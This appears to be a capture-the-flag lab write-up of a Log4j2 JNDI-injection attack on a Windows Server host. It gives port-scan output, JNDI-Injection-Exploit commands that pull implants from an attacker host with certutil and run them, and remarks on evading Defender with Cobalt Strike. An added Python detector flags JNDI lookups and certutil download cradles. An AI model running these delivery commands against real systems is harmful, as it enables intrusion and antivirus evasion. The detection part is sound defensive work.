PT-5
E:\Tool\天狐渗透工具箱-社区版V1.2\Tool\fscan\fscanplus>fscanPlus_amd64.exe -h www.rel8989.cslab
______ _____ _
| ____| | __ \| |
| |__ ___ ___ __ _ _ __ | |__) | |_ _ ___
| __/ __|/ __/ _ | _ \| ___/| | | | / __|
| | \__ \ (_| (_| | | | | | | | |_| \__ \
|_| |___/\___\__,_|_| |_|_| |_|\__,_|___/
fscan version: 1.8.4 TeamdArk5 v1.0
start infoscan
www.rel8989.cslab:139 open
www.rel8989.cslab:445 open
www.rel8989.cslab:135 open
www.rel8989.cslab:8080 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]www.rel8989.cslab
[->]WIN-2PNAS7U283S
[->]10.0.0.28
[*] WebTitle http://www.rel8989.cslab:8080 code:200 len:22 title:None
[*] NetBios www.rel8989.cslab WIN-2PNAS7U283S Windows Server 2016 Standard 14393
已完成 4/4
[*] 扫描结束,耗时: 13.1153035s
It's a Windows machine.
The hint says this is a Log4j2 vulnerability. Fuzzing did not turn up the parameter; after reading the official walkthrough I learned the parameter is:
http://www.rel8989.cslab:8080/cslab?payload=
Start JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar directly
and deliver the Vshell implant:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/1.exe 1.exe" -A 172.16.233.2
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd /c 1.exe" -A 172.16.233.2
URL-encode the payload.
No callback; it was probably killed. I remember Defender didn't use to kill Vshell…
Start CS and use 掩日 for AV evasion:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/GkN.exe GkN.exe" -A 172.16.233.2
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/GkN.txt GkN.txt" -A 172.16.233.2
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd /c GkN.exe GkN.txt" -A 172.16.233.2
Encode it and execute; the callback succeeds. Checked the AV: it's Defender.
The earlier implant really was killed.
Try uploading another one:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "certutil -urlcache -split -f http://172.16.233.2/1.exe ss.exe" -A 172.16.233.2
It uploaded, but was killed after a few seconds…
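The chain in this write-up leaves two artefacts a defender can look for: a JNDI lookup string arriving in an HTTP query parameter (URL-encoded, as the write-up notes) and a certutil -urlcache download cradle followed by execution of the file it staged. The following Python is an added example written for this page, not code from the write-up or from any of the tools it names. The log lines are constructed samples (the 192.0.2.0/24 addresses are documentation placeholders); the web-log format is assumed to be a common access-log layout and the process lines are assumed to carry a CommandLine= field. The JNDI check decodes the URL and unwraps nested lookups such as ${lower:j} before matching, because a naive substring check on `${jndi:` misses those variants.

```python
import re
from urllib.parse import unquote

# Constructed sample web access-log lines (not from the original write-up).
WEB_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cslab?payload=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1389%2Fx%7D HTTP/1.1" 200 22',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /cslab?payload=hello HTTP/1.1" 200 22',
    '10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /cslab?payload=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F192.0.2.10%2Fa%7D HTTP/1.1" 200 22',
]

# Constructed sample process-creation lines (assumed CommandLine= field layout).
PROCESS_LOG = [
    'CommandLine=certutil -urlcache -split -f http://192.0.2.10/1.exe 1.exe',
    'CommandLine=certutil -hashfile C:\\Windows\\notepad.exe SHA256',
    'CommandLine=cmd /c 1.exe',
]

# Nested lookups that resolve to a single character: ${lower:j}, ${upper:J}, ${::-j}
NESTED_CASE = re.compile(r'\$\{(?:lower|upper):([^}])\}', re.I)
NESTED_DEFAULT = re.compile(r'\$\{[^{}]*:-([^}])\}')
JNDI_LOOKUP = re.compile(r'\$\{jndi:')

# certutil download cradle: capture the URL and the local file name it writes.
CRADLE = re.compile(r'certutil(?:\.exe)?\b.*-urlcache\b.*?(https?://\S+)\s+(\S+)', re.I)


def normalize(text: str) -> str:
    """URL-decode (a few rounds) and collapse nested lookups, then lower-case."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    prev = None
    while prev != text:
        prev = text
        text = NESTED_CASE.sub(lambda m: m.group(1), text)
        text = NESTED_DEFAULT.sub(lambda m: m.group(1), text)
    return text.lower()


def find_jndi(lines):
    """Return the log lines whose normalized form contains a JNDI lookup."""
    return [line for line in lines if JNDI_LOOKUP.search(normalize(line))]


def find_cradles(lines):
    """Flag certutil download cradles and later execution of the staged file."""
    findings = []
    staged = set()
    for line in lines:
        m = CRADLE.search(line)
        if m:
            staged.add(m.group(2).lower())
            findings.append(('download_cradle', line))
            continue
        for name in staged:
            if re.search(r'\b' + re.escape(name) + r'\b', line, re.I):
                findings.append(('staged_file_executed', line))
                break
    return findings


if __name__ == '__main__':
    for hit in find_jndi(WEB_LOG):
        print('JNDI lookup in request:', hit)
    for kind, line in find_cradles(PROCESS_LOG):
        print(kind, '->', line)
```

Run against the constructed samples, the first and third web-log lines are flagged (the third only because nested lookups are unwrapped first), the certutil -hashfile line is ignored, and the cmd /c 1.exe line is tied back to the cradle that staged 1.exe. In a real deployment the same two checks belong in web-proxy and EDR rules respectively; the upstream fix for the web side is upgrading Log4j to a version without the vulnerable lookup behaviour.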